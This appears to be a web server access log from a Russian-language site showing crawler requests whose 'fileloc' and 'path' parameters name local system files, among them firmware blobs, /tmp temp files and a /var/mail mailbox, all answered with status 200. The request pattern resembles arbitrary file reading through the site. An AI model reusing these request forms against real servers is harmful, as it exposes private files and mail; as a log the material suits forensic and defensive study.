216.73.216.53 - - [03/Nov/2025:04:21:51 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Flib%2Ffirmware%2Frtlwifi%2Frtl8723aufw_B.bin&path=%2F%2Flib%2Ffirmware%2Frtlwifi HTTP/1.0" 200 55707 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
81.167.26.57 - - [03/Nov/2025:04:21:55 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//tmp/fcgid.tmp.1PGGpM&path=//tmp HTTP/1.0" 200 12278 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.53 - - [03/Nov/2025:04:21:55 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2FGeoIP%2FGeoIP.dat&path=%2F%2Fusr%2Fshare%2FGeoIP HTTP/1.0" 200 2180061 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:21:57 +1000] "GET /1440752?fileloc=//var/mail/eficenter_ru_usr&path=//var/mail HTTP/1.0" 200 12319 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
81.167.26.57 - - [03/Nov/2025:04:21:59 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//tmp/fcgid.tmp.1Wu8OK&path=//tmp HTTP/1.0" 200 12278 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
81.167.26.57 - - [03/Nov/2025:04:22:04 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//tmp/fcgid.tmp.1YTBpJ&path=//tmp HTTP/1.0" 200 12278 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.53 - - [03/Nov/2025:04:22:04 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Flib%2Ffirmware%2Fradeon%2FREDWOOD_smc.bin&path=%2F%2Flib%2Ffirmware%2Fradeon HTTP/1.0" 200 58122 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:22:07 +1000] "GET /1083952?path=//var/mail HTTP/1.0" 200 95631 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:04:22:10 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fet%2Fet_c.awk&path=%2F%2Fusr%2Fshare%2Fet HTTP/1.0" 200 20607 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
81.167.26.57 - - [03/Nov/2025:04:22:10 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//tmp/fcgid.tmp.1cZfkr&path=//tmp HTTP/1.0" 200 12278 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
